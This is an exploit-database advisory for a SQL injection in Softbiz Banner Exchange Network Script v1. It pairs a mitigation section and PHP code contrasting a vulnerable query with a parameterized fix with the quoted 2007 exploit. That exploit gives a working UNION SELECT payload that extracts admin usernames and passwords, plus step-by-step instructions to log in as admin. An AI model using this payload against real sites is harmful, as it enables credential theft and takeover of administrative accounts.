Vendor: Banner Exchange Network Script
By: IRCRASH (Dr.Crash)
CVSS: 7.5 (HIGH)
Vulnerability type: SQL Injection
CWE: 89
Product Name: Banner Exchange Network Script
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Unknown

Softbiz Banner Exchange Network Script ver 1 SQL INJECTION

Softbiz Banner Exchange Network Script ver 1 is vulnerable to SQL injection: the 'id' parameter of the 'campaign_stats.php' page is used in a database query without being validated or parameterized. By injecting SQL through this parameter (the published proof of concept uses a UNION SELECT against the script's admin table), an attacker can read sensitive data such as the admin username and password, and then use those credentials to log in to the administrative interface, effectively bypassing authentication.

Mitigation:

To mitigate this vulnerability, validate user input (an 'id' should only ever be an integer) and use prepared statements or parameterized queries so that request data can never alter the structure of a SQL statement. Additionally, keeping the software up to date with the latest security patches and conducting regular security audits can help identify and address any remaining vulnerabilities.
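The following is an added illustration of the mitigation above, written for this page; it is not the Softbiz script's own code. It shows the query pattern that makes a page like campaign_stats.php injectable next to a hardened version that validates the id as an integer and binds it through a PDO prepared statement. The table and column names (campaign_stats, campaign_id, owner_id, views, clicks), the owner scoping, and the function names are assumptions made for the example.

```php
<?php
// Added example for this page; not the Softbiz script's own code.
// Table/column names (campaign_stats, campaign_id, owner_id, views, clicks) are assumed.

// --- Vulnerable pattern: the request parameter is spliced into the SQL text. ---
// Any value in ?id= becomes part of the statement, so a crafted id can append a
// UNION SELECT that reads other tables, which is the bug class the advisory describes.
function campaign_stats_vulnerable(mysqli $db, array $get): ?array
{
    $id  = $get['id'] ?? '';
    $sql = "SELECT campaign_id, views, clicks FROM campaign_stats WHERE campaign_id = $id";
    $res = $db->query($sql);
    return $res ? $res->fetch_assoc() : null;
}

// --- Hardened pattern: validate the type, then bind the value as a parameter. ---
function campaign_stats_fixed(PDO $db, array $get, int $userId): ?array
{
    // 1. A campaign id is a positive integer; reject anything else before it
    //    reaches the database (rejects "999999 UNION ..." outright).
    $id = filter_var($get['id'] ?? null, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        http_response_code(400);
        return null;
    }

    // 2. Prepared statement: the value is sent separately from the SQL text,
    //    so it can never change the statement's structure.
    // 3. Scope the lookup to the logged-in user (assumed owner_id column) so one
    //    registered user cannot read another user's campaign data.
    $stmt = $db->prepare(
        'SELECT campaign_id, views, clicks FROM campaign_stats'
        . ' WHERE campaign_id = :id AND owner_id = :uid'
    );
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->bindValue(':uid', $userId, PDO::PARAM_INT);
    $stmt->execute();

    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Connection options that keep the fix honest: real server-side prepares rather
// than client-side emulation, and exceptions on error instead of silent failure.
function connect(string $dsn, string $user, string $pass): PDO
{
    return new PDO($dsn, $user, $pass, [
        PDO::ATTR_EMULATE_PREPARES => false,
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    ]);
}
```

Casting or validating the id as an integer alone would close this specific hole, but binding it as a parameter is the habit that also protects string parameters elsewhere in the script; a code audit should apply the same pattern to every query that touches request data.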
Source

Exploit-DB raw data:

#####################################################################################
####         Softbiz Banner Exchange Network Script ver 1 SQL INJECTION          ####
####                              BY IRCRASH                                     ####
#####################################################################################
#                                                                                   #
#                                                                                   #
#AUTHOR : IRCRASH (Dr.Crash)                                                        #
#Script Download : http://www.softbizscripts.com/                                   #
#                                                                                   #
#                                                                                   #
#####################################################################################
#Injection Address : http://sitename/campaign_stats.php?id=<SQL C0de>               #
#                                                                                   #
#SQL C0de : 999999%20union/**/select/**/0,1,2,3,4,5,6,7,8,admin_name,10,pwd,12,13,14,15/**/from/**/sbbanners_admin/*
#                                                                                   #
#####################################################################################
#Help :                                                                             #
#                                                                                   #
#Step 1 : Register in Site                                                          #
#Step 2 : Log in to User panel with your email and password                         #
#Step 3 : Go to SQL address and find admin username and password                    #
#Step 4 : Go to http://sitename/admin/ and log in with admin username and password  #
#Step 5 : :)                                                                        #
#                                                                                   #
#####################################################################################
#                                                                                   #
#Our site : Ircrash.com                                                             #
#                                                                                   #
#                                 TNX : GOD                                         #
#####################################################################################

# milw0rm.com [2007-11-11]